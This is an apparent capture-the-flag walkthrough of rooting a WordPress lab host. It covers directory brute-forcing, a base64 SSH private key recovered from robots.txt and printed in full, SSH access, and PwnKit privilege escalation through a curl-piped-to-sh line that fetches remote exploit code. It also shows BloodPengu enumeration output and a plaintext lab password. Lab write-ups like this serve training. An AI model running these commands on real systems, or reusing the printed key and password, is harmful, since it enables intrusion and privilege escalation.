200      GET        0l        0w        0c http://192.168.179.89/wp-includes/media-template.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-taxonomy.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/locale.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/ms-network.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/class-wp-dependency.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-background-position-control.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-nav-menu-item-control.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-nav-menus-panel.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-background-image-setting.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-new-menu-section.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-background-image-control.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-header-image-control.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-filter-setting.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-nav-menu-item-setting.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-new-menu-control.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-nav-menu-section.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-image-control.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-custom-css-setting.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-sidebar-section.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-site-icon-control.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-nav-menu-name-control.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-widget-form-customize-control.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-header-image-setting.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-media-control.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-nav-menu-locations-control.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-themes-panel.php
500      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-code-editor-control.php
200      GET        0l        0w        0c http://192.168.179.89/wp-includes/customize/class-wp-customize-selective-refresh.php

While waiting I decide to do manual dangerous discovery like:

robots.txt
env
.env
.git

And many more, you know what I mean.

Then I found this on robots.txt, it says a secret directory named secret.txt:

So I open it and. . .!

It’s an encoded strings looking at the text and format I believe this should’ve been an ID RSA Key:

RSA Based64 encoded

So I just decode it:

┌──(kali㉿kali)-[~]
└─$ echo "LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFB
QUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUJsd0FBQUFkemMyZ3RjbgpOaEFBQUFB
d0VBQVFBQUFZRUF0SENzU3pIdFVGOEs4dGlPcUVDUVlMcktLckNSc2J2cTZpSUc3UjlnMFdQdjl3
K2drVVdlCkl6QlNjdmdsTEU5ZmxvbHNLZHhmTVFRYk1WR3FTQURuWUJUYXZhaWdRZWt1ZTBiTHNZ
ay9yWjVGaE9VUlpMVHZkbEpXeHoKYklleUM1YTVGMERsOVVZbXpDaGU0M3owRG8waVF3MTc4R0pV
UWFxc2NMbUVhdHFJaVQvMkZrRitBdmVXM2hxUGZicnc5dgpBOVFBSVVBM2xlZHFyOFhFelkvL0xx
MCtzUWcvcFV1MEtQa1kxOGk2dm5maVlIR2t5VzFTZ3J5UGg1eDlCR1RrM2VSWWNOCnc2bURiQWpY
S0tDSEdNK2RubkdOZ3ZBa3FUK2daV3ovTXB5MGVrYXVrNk5QN05Dek9STnJJWEFZRmExcld6YUV0
eXBId1kKa0NFY2ZXSkpsWjcrZmNFRmE1QjdnRXd0L2FLZEZSWFBRd2luRmxpUU1ZTW1hdThQWmJQ
aUJJcnh0SVlYeTNNSGNLQklzSgowSFNLditIYktXOWtwVEw1T29Ba0I4ZkhGMzB1alZPYjZZVHVj
MXNKS1dSSElaWTNxZTA4STJSWGVFeEZGWXU5b0x1ZzBkCnRIWWRKSEZMN2NXaU52NG1SeUo5UmNy
aFZMMVYzQ2F6TlpLS3dyYVJBQUFGZ0g5SlFMMS9TVUM5QUFBQUIzTnphQzF5YzIKRUFBQUdCQUxS
d3JFc3g3VkJmQ3ZMWWpxaEFrR0M2eWlxd2tiRzc2dW9pQnUwZllORmo3L2NQb0pGRm5pTXdVbkw0
SlN4UApYNWFKYkNuY1h6RUVHekZScWtnQTUyQVUycjJvb0VIcExudEd5N0dKUDYyZVJZVGxFV1Mw
NzNaU1ZzYzJ5SHNndVd1UmRBCjVmVkdKc3dvWHVOODlBNk5Ja01OZS9CaVZFR3FySEM1aEdyYWlJ
ay85aFpCZmdMM2x0NGFqMzI2OFBid1BVQUNGQU41WG4KYXEvRnhNMlAveTZ0UHJFSVA2Vkx0Q2o1
R05mSXVyNTM0bUJ4cE1sdFVvSzhqNGVjZlFSazVOM2tXSERjT3BnMndJMXlpZwpoeGpQblo1eGpZ
THdKS2svb0dWcy96S2N0SHBHcnBPalQrelFzemtUYXlGd0dCV3RhMXMyaExjcVI4R0pBaEhIMWlT
WldlCi9uM0JCV3VRZTRCTUxmMmluUlVWejBNSXB4WllrREdESm1ydkQyV3o0Z1NLOGJTR0Y4dHpC
M0NnU0xDZEIwaXIvaDJ5bHYKWktVeStUcUFKQWZIeHhkOUxvMVRtK21FN25OYkNTbGtSeUdXTjZu
dFBDTmtWM2hNUlJXTHZhQzdvTkhiUjJIU1J4UyszRgpvamIrSmtjaWZVWEs0VlM5VmR3bXN6V1Np
c0sya1FBQUFBTUJBQUVBQUFHQkFMQ3l6ZVp0SkFwYXFHd2I2Y2VXUWt5WFhyCmJqWmlsNDdwa05i
VjcwSldtbnhpeFkzMUtqckRLbGRYZ2t6TEpSb0RmWXAxVnUrc0VUVmxXN3RWY0JtNU1abVFPMWlB
cEQKZ1VNemx2RnFpRE5MRktVSmRUajdmcXlPQVhEZ2t2OFFrc05tRXhLb0JBakduTTl1OHJSQXlq
NVBObzF3QVdLcENMeElZMwpCaGRsbmVOYUFYRFYvY0tHRnZXMWFPTWxHQ2VhSjBEeFNBd0c1Snlz
NEtpNmtKNUVrZldvOGVsc1VXRjMwd1FrVzl5aklQClVGNUZxNnVkSlBubUVXQXB2THQ2MkllVHZG
cWcrdFB0R25WUGxlTzNsdm5DQkJJeGY4dkJrOFd0b0pWSmRKdDNoTzhjNGoKa010WHN2TGdSbHZl
MWJaVVpYNU15bUhhbE4vTEExSXNvQzRZa2cvcE1nM3M5Y1lSUmttK0d4aVVVNWJ2OWV6d000Qm1r
bwpRUHZ5VWN5ZTI4endrTzZ0Z1ZNWng0b3NySW9OOVd0RFVVZGJkbUQyVUJaMm4zQ1pNa09WOVhK
eGVqdTUxa0gxZnM4cTM5ClFYZnhkTmhCYjNZcjJSakNGVUxEeGh3RFNJSHpHN2dmSkVEYVdZY09r
TmtJYUhIZ2FWN2t4enlwWWNxTHJzMFM3QzRRQUEKQU1FQWhkbUQ3UXU1dHJ0QkYzbWdmY2RxcFpP
cTYrdFc2aGttUjBoWk5YNVo2Zm5lZFV4Ly9RWTVzd0tBRXZnTkNLSzhTbQppRlhsWWZnSDZLLzVV
blpuZ0Viak1RTVRkT09sa2JyZ3BNWWloK1pneXZLMUxvT1R5TXZWZ1Q1TE1nakpHc2FRNTM5M00y
CnlVRWlTWGVyN3E5ME42VkhZWERKaFVXWDJWM1FNY0NxcHRTQ1MxYlNxdmttTnZoUVhNQWFBUzhB
SncxOXFYV1hpbTE1U3AKV29xZGpvU1dFSnhLZUZUd1VXN1dPaVlDMkZ2NWRzM2NZT1I4Um9yYm1H
bnpkaVpneFpBQUFBd1FEaE5YS21TMG9WTWREeQozZktaZ1R1d3I4TXk1SHlsNWpyYTZvd2ovNXJK
TVVYNnNqWkVpZ1phOTZFamNldlpKeUdURjJ1Vjc3QVEyUnF3bmJiMkdsCmpkTGtjMFl0OXVicVNp
a2Q1ZjhBa1psWkJzQ0lydnVEUVpDb3haQkd1RDJEVVd6T2dLTWxmeHZGQk5RRitMV0ZndGJyU1AK
T2dCNGloZFBDMSs2RmRTalFKNzdmMWJOR0htbjBhbW9pdUpqbFVPT1BMMWNJUHp0MGh6RVJMajJx
djlEVWVsVE9VcmFuTwpjVVdyUGdyelZHVCtRdmtrakdKRlgrcjh0R1dDQU9RUlVBQUFEQkFNMGNS
aERvd09GeDUwSGtFK0hNSUoyalFJZWZ2d3BtCkJuMkZONmt3NEdMWmlWY3FVVDZhWTY4bmpMaWh0
RHBlZVN6b3BTanlLaDEwYk53UlMwREFJTHNjV2c2eGMvUjh5dWVBZUkKUmN3ODV1ZGtoTlZXcGVy
ZzRPc2lGWk1wd0txY01sdDhpNmxWbW9VQmpSdEJENGc1TVlXUkFOTzBOajlWV01UYlc5UkxpUgpr
dW9SaVNoaDZ1Q2pHQ0NIL1dmd0NvZjllbkNlajRIRWo1RVBqOG5aMGNNTnZvQVJxN1ZuQ05HVFBh
bWNYQnJmSXd4Y1ZUCjhuZksyb0RjNkxmckRtalFBQUFBbHZjMk53UUc5elkzQT0KLS0tLS1FTkQg
T1BFTlNTSCBQUklWQVRFIEtFWS0tLS0tCg==" | base64 -d
-----BEGIN OPENSSH PRIVATE KEY-----
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
8nfK2oDc6LfrDmjQAAAAlvc2NwQG9zY3A=
-----END OPENSSH PRIVATE KEY-----

So yeah, we got the key:

So now we needed to find the owner of this key in order to uses it as logon via SSH protocol:

Initial Access as Local User “OSCP“

I first try with admin, due to Username in the WordPress:

And WPScan:

┌──(kali㉿kali)-[~]
└─$ sudo wpscan --url http://192.168.179.89/ --enumerate u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.28
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.179.89/ [192.168.179.89]
[+] Started: Wed Mar  4 06:58:43 2026

Interesting Finding(s):

[+] Headers
. . .[SNIP]. . . 
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.179.89/wp-content/themes/twentytwenty/style.css?ver=1.2, Match: 'Version: 1.2'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===============================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.179.89/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
. . .[SNIP]. . .

But it’s incorrect.

┌──(kali㉿kali)-[~]
└─$ sudo ssh admin@192.168.179.89 -i id_rsa 
The authenticity of host '192.168.179.89 (192.168.179.89)' can't be established.
ED25519 key fingerprint is SHA256:OORLHLygIlTRZ4nXi9nq+WIrJ26fv7tfgvVHm8FaAzE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.179.89' (ED25519) to the list of known hosts.
admin@192.168.179.89: Permission denied (publickey).

Until I’ve tried OSCP:

┌──(kali㉿kali)-[~]
└─$ sudo ssh oscp@192.168.179.89 -i id_rsa
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 System information disabled due to load higher than 1.0


381 updates can be installed immediately.
271 of these updates are security updates.
To see these additional updates run: apt list --upgradable



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

-bash-5.0$ id
uid=1000(oscp) gid=1000(oscp) groups=1000(oscp),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)

And we’re in.

PrivEsc via CVE-2021-4034 (PkExec)

Just:

-bash-5.0$ uname -a
Linux oscp 5.4.0-40-generic #44-Ubuntu SMP Tue Jun 23 00:01:04 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

So just fire:

github.com/ly4k/PwnKit

sh -c “$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)”

-bash-5.0$ sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
To run a command as administrator (user "root"), use "sudo ".
See "man sudo_root" for details.

root@oscp:/home/oscp#

That’s it, we gain Administrator.

Bonus: gxc-BloodPengu.py Discovery

To find that path-way of PrivEsc, we can elevate BloodPengu Python kit, now it’s updated with RSA/Key logon support for enumeration.

BloodPengu at this Time is v1.4.2:

┌──(venv)─(root㉿kali)-[/]
└─# bloodpengu-python 192.168.179.89 -u oscp -k id_rsa -o out.json

                                                                      
                /MM0MM                                                
                     hM       -w1MMMxXX                               
                           wMMMMMMMMMMM0hM                            
                     h  /0MMhMhhMMM0MMMhMMMh                          
                       M/h0hMMxM/1hhhM>hhh^x/^                        
                    hhMhMX hhMh       0>     ww                       
                  MM   M0Mh0 -w      -xhI    ^                        
                    --h-1/Mh>h-      0w    -  x                       
                   -XXXw>1h wwIhXww-hhh^   whwhh                      
                    X>I^h1 Iw- 0hMhhhhhwhhhhh                         
                    ^MI0-1 ^^Xww hhX> M1hwhMwh                        
                  I >1 h^ >/  hw0-I0MXMMxwhMhhx     Mh> w             
                 11 hhhhh1  /II00 ^0xMX1^hwh hh          0/           
               x>0-xh ^x/  Xx^w0   h1Mh0Ihwh X>>0      wwM/           
               1 -xw  X  w0hxh>   h/hM-/>hXh^   >w>XhwXwIX            
              1 w0h>   w/-hhw xx- MMwhw^0w1  >w  -I II                
              Ix 0hM x/w0 1h > X Ihhhh h/0^ /hhh/w/x                  
              h w^-h>wh^I hxM  hhMhhh  wh- Ix1 Mhxhhhhw               
                 0>00/1X   hhhhhh1hh w0x1 ->X/0> w^ hIhhw>            
           >w0/ -   /     1I^Xww1 -X0> - 1w00X1X  10 - wXXx           
           I00-        w00/  I  >0xhX/ 1  0/1Ix0wIx    Iw/x           
            1 wwhhhhhh1h > 11  00-hh^ x1    ^   w>wXw 0X0I            
            w/w1--  ^^wI^ >>  wwhhh0 ^I -w / 0   X>x -1  1^           
              X 0I1 0^x1^x0   0whwI  ^wx  x>h ^   I   1x 1            
                        Xx    xwhwX  w//  11 X/0  11  1 >I            
                       Ix/    h/h>I  0    h>-1I0   >I>>               
                       > x/ 0  /hw>> ^XX0w- X>h^                      
                            -  -whxwww10^-hw/^0                       
                                ^--^  -^0w/>ww                        
                                 Iw-xh >I-                            
                                     w                                

                           v1.4.2 [Mad Horv3n]                           

  gxc-BloodPengu.py v1.4.2 | by <@byt3n33dl3>
  Data collector in Python for BloodPengu APM

  ----------------------------------------------------------------------

  [*]  Target  : 192.168.179.89:22
  [*]  User    : oscp
  [*]  Auth    : key:id_rsa
  [*]  Mode    : full collection
  [*]  Output  : out.json

  [*]  Connecting to 192.168.179.89:22...
  [+]  Connected in 0.37s  -  oscp@192.168.179.89:22
  [+]  Remote  : Linux oscp 5.4.0-40-generic #44-Ubuntu SMP Tue Jun 23 00:01:04 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

  ----------------------------------------------------------------------

  [*]  Collecting users and groups...
  [+]  Users: 34  |  Groups: 60
  [*]  Collecting sudo rules...
  [-]  sudo -l returned nothing - no sudo access or not in sudoers
  [*]  Collecting SUID/SGID binaries...
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core18/1885/bin/mount
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core18/1885/bin/umount
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core18/1754/bin/mount
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core18/1754/bin/umount
  [CRITICAL]  suid            GTFOBins SUID binary: /usr/bin/mount
  [CRITICAL]  suid            GTFOBins SUID binary: /usr/bin/at
  [CRITICAL]  suid            GTFOBins SUID binary: /usr/bin/bash
  [CRITICAL]  suid            GTFOBins SUID binary: /usr/bin/umount
  [+]  SUID/SGID: 66  |  GTFOBins hits: 8
  [*]  Collecting privileged group memberships...
  [CRITICAL]  groups          Member of lxd group - image escape to root
  [HIGH    ]  groups          Member of sudo group - likely sudo access
  [POTENTIAL]  groups          Member of adm - log access, possible credential leakage
  [+]  Groups: adm, cdrom, dip, lxd, oscp, plugdev, sudo
  [*]  Collecting systemd service units...
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/rcS.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/hwclock.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/x11-common.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/lvm2.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/screen-cleanup.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/cryptdisks.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/multipath-tools-boot.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/cryptdisks-early.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/rc.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/sudo.service
  [CRITICAL]  services        Writable systemd unit: /usr/lib/systemd/system/rcS.service
  [CRITICAL]  services        Writable systemd unit: /usr/lib/systemd/system/hwclock.service
  [CRITICAL]  services        Writable systemd unit: /usr/lib/systemd/system/x11-common.service
  [CRITICAL]  services        Writable systemd unit: /usr/lib/systemd/system/lvm2.service
  [CRITICAL]  services        Writable systemd unit: /usr/lib/systemd/system/screen-cleanup.service
  [CRITICAL]  services        Writable systemd unit: /usr/lib/systemd/system/cryptdisks.service
  [CRITICAL]  services        Writable systemd unit: /usr/lib/systemd/system/multipath-tools-boot.service
  [CRITICAL]  services        Writable systemd unit: /usr/lib/systemd/system/cryptdisks-early.service
  [CRITICAL]  services        Writable systemd unit: /usr/lib/systemd/system/rc.service
  [CRITICAL]  services        Writable systemd unit: /usr/lib/systemd/system/sudo.service
  [+]  Units scanned: 523  |  Writable: 20
  [*]  Collecting cron jobs and scheduled tasks...
  [+]  Cron entries collected: 1
  [*]  Collecting kernel information...
  [HIGH    ]  kernel          Kernel 5.4.0-40-generic may be vulnerable to CVE-2021-4034
  [HIGH    ]  kernel          Kernel 5.4.0-40-generic may be vulnerable to CVE-2021-3156
  [HIGH    ]  kernel          Kernel 5.4.0-40-generic may be vulnerable to CVE-2022-0847
  [+]  Kernel: 5.4.0-40-generic  |  CVE matches: 3
  [*]  Collecting container and cloud context...
  [+]  Docker socket: False  |  In container: False
  [*]  Collecting network information...
  [POTENTIAL]  network         Interesting internal service: mysql (port 3306): tcp    LISTEN  0       70           127.0.0.1:33060        0.0.0.0:*
  [POTENTIAL]  network         Interesting internal service: mysql (port 3306): tcp    LISTEN  0       151          127.0.0.1:3306         0.0.0.0:*
  [+]  Interfaces: 1  |  Interesting services: 2
  [*]  Collecting environment and interesting files...
  [CRITICAL]  env             SSH/crypto key: /home/oscp/.ssh/id_rsa  (perms: 600)
  [HIGH    ]  env             Sensitive commands in history: /home/oscp/.bash_history
  [+]  Env collected  |  Interesting files: 2
  [*]  Running SACSPengu analysis...
  [POTENTIAL]  sacspengu       Compiler/interpreter: python3 -> /usr/bin/python3
  [POTENTIAL]  sacspengu       Compiler/interpreter: perl -> /usr/bin/perl
  [POTENTIAL]  sacspengu       Compiler/interpreter: php -> /usr/bin/php
  [CRITICAL]  sacspengu       Dangerous capability: /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
  [+]  Compilers: 3  |  Writable PATH dirs: 0  |  Capabilities scanned
  [*]  Running AVRisk...
  [HIGH    ]  avrisk          AppArmor active: apparmor module is loaded.
  [HIGH    ]  avrisk          Security software detected: AUDITD  (procs=auditd)
  [HIGH    ]  avrisk          Security software detected: APPARMOR  (bins=/usr/sbin/aa-status  paths=/etc/apparmor,/etc/apparmor.d)
  [HIGH    ]  avrisk          Security software detected: SELINUX  (paths=/etc/selinux)
  [POTENTIAL]  avrisk          Active log files found (10) : review for credential or activity capture
  [+]  Security products detected: 3  |  Products: auditd, apparmor, selinux

  ----------------------------------------------------------------------

  [+]  Collection complete in 102.00s

  [CRITICAL ]  31
  [HIGH     ]  9
  [POTENTIAL]  7

  [~]  Total findings  :  47
  [~]  Graph nodes     :  371
  [~]  Graph edges     :  130
  [~]  Output file     :  out.json

  [+]  Import out.json into BloodPengu via Import JSON

  ----------------------------------------------------------------------

  gxc-BloodPengu.py v1.4.2 by <@byt3n33dl3>

Let’s see the Graph:

As we see, there’s many attack-paths, and 3 of em are having Kernel effect:

He we go, the PolKit PkExec vuln:

Happy hacking!

BloodPengu and gxc-BloodPengu.py

Sulaiman — Mon, 02 Mar 2026 04:14:21 GMT

Scenario:

Me as Pentester already found pair credential for logon via SSH, this would help BloodPengu.py due to it’s needing SSH logon.

Credential:

user: love
passwd: P@$$w0rd@123

┌──(kali㉿kali)-[~]
└─$ sudo nxc ssh 192.168.221.211 -u love -p 'P@$$w0rd@123'
SSH         192.168.221.211 22     192.168.221.211  [*] SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
SSH         192.168.221.211 22     192.168.221.211  [+] love:P@$$w0rd@123  Linux - Shell access!

Usage to when pentester use BloodPengu.py:

Having SSH logon access.

As now we already having logon access, let’s use BloodPengu.py:

┌──(venv)─(root㉿kali)-[/]
└─# bloodpengu-python 192.168.221.211 -u love -p 'P@$$w0rd@123' -o out.json              

                                                                      
                /MM0MM                                                
                     hM       -w1MMMxXX                               
                           wMMMMMMMMMMM0hM                            
                     h  /0MMhMhhMMM0MMMhMMMh                          
                       M/h0hMMxM/1hhhM>hhh^x/^                        
                    hhMhMX hhMh       0>     ww                       
                  MM   M0Mh0 -w      -xhI    ^                        
                    --h-1/Mh>h-      0w    -  x                       
                   -XXXw>1h wwIhXww-hhh^   whwhh                      
                    X>I^h1 Iw- 0hMhhhhhwhhhhh                         
                    ^MI0-1 ^^Xww hhX> M1hwhMwh                        
                  I >1 h^ >/  hw0-I0MXMMxwhMhhx     Mh> w             
                 11 hhhhh1  /II00 ^0xMX1^hwh hh          0/           
               x>0-xh ^x/  Xx^w0   h1Mh0Ihwh X>>0      wwM/           
               1 -xw  X  w0hxh>   h/hM-/>hXh^   >w>XhwXwIX            
              1 w0h>   w/-hhw xx- MMwhw^0w1  >w  -I II                
              Ix 0hM x/w0 1h > X Ihhhh h/0^ /hhh/w/x                  
              h w^-h>wh^I hxM  hhMhhh  wh- Ix1 Mhxhhhhw               
                 0>00/1X   hhhhhh1hh w0x1 ->X/0> w^ hIhhw>            
           >w0/ -   /     1I^Xww1 -X0> - 1w00X1X  10 - wXXx           
           I00-        w00/  I  >0xhX/ 1  0/1Ix0wIx    Iw/x           
            1 wwhhhhhh1h > 11  00-hh^ x1    ^   w>wXw 0X0I            
            w/w1--  ^^wI^ >>  wwhhh0 ^I -w / 0   X>x -1  1^           
              X 0I1 0^x1^x0   0whwI  ^wx  x>h ^   I   1x 1            
                        Xx    xwhwX  w//  11 X/0  11  1 >I            
                       Ix/    h/h>I  0    h>-1I0   >I>>               
                       > x/ 0  /hw>> ^XX0w- X>h^                      
                            -  -whxwww10^-hw/^0                       
                                ^--^  -^0w/>ww                        
                                 Iw-xh >I-                            
                                     w                                

                           v1.3.9 [Kraken Husk]                          

  gxc-BloodPengu.py v1.3.9 | by <@byt3n33dl3>
  Data collector in Python for BloodPengu APM

  ----------------------------------------------------------------------

  [*]  Target  : 192.168.221.211:22
  [*]  User    : love
  [*]  Auth    : password
  [*]  Mode    : full collection
  [*]  Output  : out.json

  [*]  Connecting to 192.168.221.211:22...
  [+]  Connected in 0.30s  -  love@192.168.221.211:22
